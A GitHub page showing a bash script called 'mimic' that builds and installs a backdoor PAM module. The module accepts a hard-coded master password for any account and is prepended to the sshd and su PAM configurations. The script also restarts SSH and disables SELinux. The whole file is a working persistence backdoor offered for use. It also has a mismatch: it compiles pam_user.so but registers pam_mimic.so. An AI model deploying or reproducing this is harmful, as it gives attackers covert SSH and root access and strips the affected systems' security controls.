-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmimic
More file actions
182 lines (151 loc) · 5.35 KB
/
mimic
File metadata and controls
182 lines (151 loc) · 5.35 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
#!/bin/bash
# Variables
MASTER_PASSWORD="mimic"
MODULE_NAME="pam_user"
MODULE_FILE="${MODULE_NAME}.c"
SO_FILE="/lib/x86_64-linux-gnu/security/${MODULE_NAME}.so"
PAM_SSHD_CONF="/etc/pam.d/sshd"
PAM_SU_CONF="/etc/pam.d/su"
BCRYPT_SALT="$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 22)" # Adjust salt length as needed
# Function to display the ASCII art banner
display_banner() {
clear
echo " .__ .__ "
echo " _____ |__| _____ |__| ____ "
echo " / \\| |/ \\| |/ ___\\ "
echo "| Y Y \\ | Y Y \\ \\ \\___ "
echo "|__|_| /__|__|_| /__|\\___ >"
echo " \\/ \\/ \\/ "
echo " "
echo " https://github.com/Dack985/Mimic/"
echo ""
}
# Function to create bcrypt hash of the password
gen_bcrypt_pass() {
python3 -c "import crypt; print(crypt.crypt('$MASTER_PASSWORD', '\$2b\$12\$${BCRYPT_SALT}'))"
}
# Install required packages
echo "Installing required packages..."
sudo apt-get update && sudo apt-get install -y build-essential libpam0g-dev python3 libcrypt-dev pamtester
if [[ $? -ne 0 ]]; then
echo "Failed to install required packages."
exit 1
fi
echo "Required packages installed successfully."
# Display banner
display_banner
# Create the PAM module source code
BCRYPT_HASH=$(gen_bcrypt_pass)
echo "Creating PAM module source code..."
cat <<EOF > $MODULE_FILE
#include <security/pam_modules.h>
#include <security/pam_ext.h>
#include <string.h>
#include <crypt.h>
#include <stdio.h>
#include <syslog.h>
// Define the hashed version of the password "mimic"
static const char *mimic_password_hash = "$BCRYPT_HASH"; // Use the generated Bcrypt hash here
PAM_EXTERN int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
const char *username;
const char *password;
char *hashed_input;
if (pam_get_user(pamh, &username, NULL) != PAM_SUCCESS) {
pam_syslog(pamh, LOG_ERR, "Failed to get username");
return PAM_AUTH_ERR;
}
if (pam_get_authtok(pamh, PAM_AUTHTOK, &password, NULL) != PAM_SUCCESS) {
pam_syslog(pamh, LOG_ERR, "Failed to get password for user %s", username);
return PAM_AUTH_ERR;
}
hashed_input = crypt(password, mimic_password_hash);
if (hashed_input == NULL) {
pam_syslog(pamh, LOG_ERR, "Error hashing the provided password for user %s", username);
return PAM_AUTH_ERR;
}
if (strcmp(hashed_input, mimic_password_hash) == 0) {
pam_syslog(pamh, LOG_NOTICE, "User %s authenticated with the mimic password", username);
return PAM_SUCCESS;
} else {
pam_syslog(pamh, LOG_NOTICE, "User %s failed authentication with the mimic password", username);
return PAM_AUTH_ERR;
}
}
PAM_EXTERN int pam_sm_setcred(pam_handle_t *pamh, int flags, int argc, const char **argv) {
return PAM_SUCCESS;
}
PAM_EXTERN int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) {
return PAM_SUCCESS;
}
PAM_EXTERN int pam_sm_open_session(pam_handle_t *pamh, int flags, int argc, const char **argv) {
return PAM_SUCCESS;
}
PAM_EXTERN int pam_sm_close_session(pam_handle_t *pamh, int flags, int argc, const char **argv) {
return PAM_SUCCESS;
}
EOF
if [[ $? -ne 0 ]]; then
echo "Failed to create PAM module source code."
exit 1
fi
echo "PAM module source code created successfully."
# Compile the PAM module
echo "Compiling PAM module..."
gcc -fPIC -fno-stack-protector -c $MODULE_FILE
sudo ld -x --shared -o $SO_FILE ${MODULE_NAME}.o -lcrypt
rm ${MODULE_NAME}.o # Clean up the object file after linking
if [[ $? -ne 0 ]]; then
echo "Failed to compile PAM module."
exit 1
fi
echo "PAM module compiled and installed successfully."
# Verify the module is in place
if [[ -f $SO_FILE ]]; then
echo "PAM module file $SO_FILE is in place."
else
echo "PAM module file $SO_FILE is missing."
exit 1
fi
# Create the prepend_pam.sh script
echo "Creating the prepend_pam.sh script..."
cat << 'EOF' > prepend_pam.sh
#!/bin/bash
# Define the line to prepend
PAM_MIMIC_LINE="auth sufficient /lib/x86_64-linux-gnu/security/pam_mimic.so"
# Function to prepend the line to a file if it doesn't already exist
prepend_line() {
local file="$1"
if ! grep -qF "$PAM_MIMIC_LINE" "$file"; then
# Prepend the line to the file
echo "$PAM_MIMIC_LINE" | cat - "$file" > temp && mv temp "$file"
echo "Prepended line to $file"
else
echo "Line already exists in $file"
fi
}
# Prepend the line to /etc/pam.d/sshd and /etc/pam.d/su
prepend_line "/etc/pam.d/sshd"
prepend_line "/etc/pam.d/su"
EOF
# Make the script executable
chmod +x prepend_pam.sh
# Run the prepend_pam.sh script
echo "Running the prepend_pam.sh script..."
sudo ./prepend_pam.sh
# Restart SSH service
echo "Restarting SSH service..."
sudo systemctl restart sshd
# Adjust SELinux policy if installed
if [[ -f /etc/selinux/config ]]; then
echo "Disabling SELinux..."
sudo sed -i 's/^SELINUX=.*/SELINUX=disabled/' /etc/selinux/config
sudo setenforce 0
fi
# Check permissions of the PAM module
echo "Setting proper permissions for PAM module..."
sudo chown root:root $SO_FILE
sudo chmod 644 $SO_FILE
# Test the module with pamtester
echo "Testing the module with pamtester..."
pamtester sshd $(whoami) authenticate
echo "Setup complete. PAM module $MODULE_NAME is now installed, configured, and tested."